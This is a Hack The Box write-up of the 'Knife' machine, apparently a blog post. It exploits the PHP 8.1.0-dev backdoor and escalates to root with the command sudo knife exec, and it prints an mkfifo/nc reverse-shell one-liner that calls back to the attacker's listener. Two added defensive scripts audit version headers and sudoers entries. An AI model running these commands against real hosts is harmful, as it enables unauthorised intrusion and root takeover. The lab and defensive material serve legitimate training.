[HTB] knife (php backdoor, sudo abuse: knife)

Keywords: penetration test


The host attacked in this article is legally authorized for testing. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and attack ideas from this article for any illegal purpose. I will not bear any responsibility for any consequences, nor be responsible for any misuse or damage.

Service detection

└─# nmap -sV -Pn    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 23:34 EST
Nmap scan report for
Host is up (0.34s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.42 seconds

Directory brute-forcing

└─# python3 dirsearch.py -e* -t 100 -u

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/

Error Log: /root/dirsearch/logs/errors-21-11-27_23-34-49.log


[23:34:50] Starting:  
[23:36:09] 200 -    6KB - /index.php                                        
[23:36:09] 200 -    6KB - /index.php/login/                                 

There do not seem to be any particularly useful pages or directories.

Source code review

I don't see anything useful in the page source.

Software version enumeration

Port 80 serves a website for something called EMA. After looking it up, EMA is Emergency Medical Associates, an emergency medical services provider. I don't see any obvious CMS.
No useful vulnerabilities are known for this Apache version.
No useful vulnerabilities are known for this SSH version.

Initial shell

View site information:

└─# whatweb -a 3
[200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

We see that the website runs PHP/8.1.0-dev. A Google search shows that this development version contains a backdoor. We use the attack script below to get the initial shell.
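The whole foothold here comes from one response header advertising an unreleased PHP build. As an added example (not part of the original writeup), the following script parses a raw HTTP response and flags version-disclosing headers, rating any pre-release version string (such as the 8.1.0-dev seen above) as high severity. The sample response is constructed from the whatweb output above; the header names and the remediation directives (expose_php, ServerTokens) are standard PHP and Apache settings, not anything from the target.

```python
import re

# Constructed sample response, modelled on the whatweb output above (not a real capture).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Emergent Medical Idea</title></html>"
)

# Headers that commonly leak software and version information.
DISCLOSURE_HEADERS = ("server", "x-powered-by")

# A digit followed by a pre-release marker (8.1.0-dev, 2.0beta3, 1.4-rc1, ...).
PRERELEASE_MARKERS = re.compile(r"\d(?:-dev|-?alpha\d*|-?beta\d*|-?rc\d*)\b", re.IGNORECASE)

# Configuration directives that stop each header from being emitted.
REMEDIATION = {
    "server": "Apache: set ServerTokens Prod and ServerSignature Off",
    "x-powered-by": "PHP: set expose_php = Off in php.ini",
}


def parse_headers(raw):
    """Split a raw HTTP response into a {lowercase-name: value} dict (first header wins)."""
    head, _, _body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        key = name.strip().lower()
        if sep and key not in headers:
            headers[key] = value.strip()
    return headers


def find_version_disclosures(raw):
    """Return (header, value, severity, fix) for every version-disclosing header.

    Pre-release versions are rated high: they signal a build that was never
    meant to be exposed and, as in this box, may carry debug or backdoor code.
    """
    findings = []
    for name, value in parse_headers(raw).items():
        if name not in DISCLOSURE_HEADERS:
            continue
        severity = "high" if PRERELEASE_MARKERS.search(value) else "medium"
        findings.append((name, value, severity, REMEDIATION[name]))
    return findings


if __name__ == "__main__":
    for name, value, severity, fix in find_version_disclosures(SAMPLE_RESPONSE):
        print(f"[{severity}] {name}: {value}  ->  {fix}")
```

Run against the constructed sample it reports the Apache banner as medium and the PHP/8.1.0-dev header as high; the same check can be pointed at a real response body captured with curl -i.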

Download the attack code locally and launch the attack:

└─# python3 499933.py                                                                     
Enter the full host url:

Interactive shell is opened on 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

$ whoami

We now have an initial shell.

Get user.txt

$ find / -name user.txt

Privilege escalation

View sudo privileges

$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife can be run as root without a password.
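The sudoers entry above is the whole privilege escalation: knife runs as root, with no password and no argument restriction, and its exec subcommand runs arbitrary code. As an added example (not part of the original writeup), the following script parses `sudo -l` output and flags root, argument-free entries for binaries that can execute code. The sample input is the sudo -l output above; the list of code-executing binaries is an assumption seeded only with knife and is meant to be extended for your environment.

```python
import re

# Constructed sample: the sudo -l output for james on knife shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# One sudo -l rule line: "(runas_user : runas_group) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")

# Binaries whose normal features include running arbitrary code as the invoking
# user; knife's `exec -E` is the one shown in this writeup (assumed list, extend it).
CODE_EXEC_BINARIES = {"/usr/bin/knife"}


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()  # drop the ": group" part
        tags = {t.strip(":") for t in m.group("tags").split()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags, "commands": cmds})
    return rules


def audit_rules(rules):
    """Return (command, reason) findings for rules that hand out root code execution."""
    findings = []
    for rule in rules:
        as_root = rule["runas"] in ("root", "ALL")
        if not as_root:
            continue
        for cmd in rule["commands"]:
            if cmd == "ALL":
                findings.append((cmd, "unrestricted root command"))
                continue
            binary = cmd.split()[0]
            # Only an entry with no arguments lets the user pick any subcommand,
            # e.g. `knife exec`; "/usr/bin/knife node list" is pinned to that line.
            if binary in CODE_EXEC_BINARIES and cmd == binary:
                reason = "runs as root with no argument restriction and can execute arbitrary code"
                if rule["nopasswd"]:
                    reason += " (NOPASSWD)"
                findings.append((cmd, reason))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"RISK: {cmd}: {reason}")
```

The check deliberately stays quiet for an entry such as `(root) /usr/bin/knife node list`, because sudoers matches the full command line and that form does not allow the exec subcommand; pinning the exact knife invocations an operator needs, and dropping NOPASSWD, is the fix for the entry found on this box.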

We use the following command to escalate to root:

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'


$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
No input file specified.

After testing, we find that the exploit's shell is not a full shell, and many commands do not execute correctly.

Checking the current user's home directory, we find SSH login credentials:

$ ls -alh /home/james/.ssh
total 16K
drwx------ 2 james james 4.0K May 18  2021 .
drwxr-xr-x 5 james james 4.0K May 18  2021 ..
-rw------- 1 james james 3.4K May  7  2021 id_rsa
-rw-r--r-- 1 james james  741 May  7  2021 id_rsa.pub

We add the public key to id_rsa.pub on the target, download the private key locally and log in with ssh -i, but a password is still required. Checking the SSH configuration in /etc/ssh/sshd_config shows that private-key login is not enabled.

It seems we have hit a dead end again.

We then try full-shell reverse payloads back to Kali one by one and find that the following payload works:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

Get root.txt

└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 38954
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "__import__('pty').spawn('/bin/bash')"
james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

# # id
uid=0(root) gid=0(root) groups=0(root)
# whoami
# cat /root/root.txt
cat /root/root.txt
{I'm kidding you~}

Posted by simon622 on Sun, 28 Nov 2021 11:04:39 -0800